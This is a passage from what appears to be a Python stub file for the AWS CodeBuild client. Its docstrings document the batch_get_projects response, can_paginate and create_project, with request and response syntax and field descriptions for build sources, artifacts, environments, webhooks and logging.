- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before timing out any related build that did not get marked as completed. The default is 60 minutes.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
- **tags** *(list) --*
The tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag's key.
- **value** *(string) --*
The tag's value.
- **created** *(datetime) --*
When the build project was created, expressed in Unix time format.
- **lastModified** *(datetime) --*
When the build project's settings were last modified, expressed in Unix time format.
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
- **vpcConfig** *(dict) --*
Information about the VPC configuration that AWS CodeBuild accesses.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
- **badge** *(dict) --*
Information about the build badge for the build project.
- **badgeEnabled** *(boolean) --*
Set this to true to generate a publicly accessible URL for your project's build badge.
- **badgeRequestUrl** *(string) --*
The publicly-accessible URL through which you can access the build badge for your project.
The publicly accessible URL through which you can access the build badge for your project.
- **logsConfig** *(dict) --*
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **projectsNotFound** *(list) --*
The names of build projects for which information could not be found.
- *(string) --*
:type names: list
:param names: **[REQUIRED]**
The names of the build projects.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_project(self, name: str, source: Dict, artifacts: Dict, environment: Dict, serviceRole: str, description: str = None, secondarySources: List = None, secondaryArtifacts: List = None, cache: Dict = None, timeoutInMinutes: int = None, queuedTimeoutInMinutes: int = None, encryptionKey: str = None, tags: List = None, vpcConfig: Dict = None, badgeEnabled: bool = None, logsConfig: Dict = None) -> Dict:
"""
Creates a build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/CreateProject>`_
**Request Syntax**
::
response = client.create_project(
name='string',
description='string',
source={
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
secondarySources=[
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
artifacts={
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
secondaryArtifacts=[
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
cache={
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
environment={
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
serviceRole='string',
timeoutInMinutes=123,
queuedTimeoutInMinutes=123,
encryptionKey='string',
tags=[
{
'key': 'string',
'value': 'string'
},
],
vpcConfig={
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
badgeEnabled=True|False,
logsConfig={
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
)
**Response Syntax**
::
{
'project': {
'name': 'string',
'arn': 'string',
'description': 'string',
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'artifacts': {
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'encryptionKey': 'string',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'created': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
},
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'badge': {
'badgeEnabled': True|False,
'badgeRequestUrl': 'string'
},
'logsConfig': {
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
- **project** *(dict) --*
Information about the build project that was created.
- **name** *(string) --*
The name of the build project.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build project.
- **description** *(string) --*
A description that makes the build project easy to identify.
- **source** *(dict) --*
Information about the build input source code for this build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **artifacts** *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
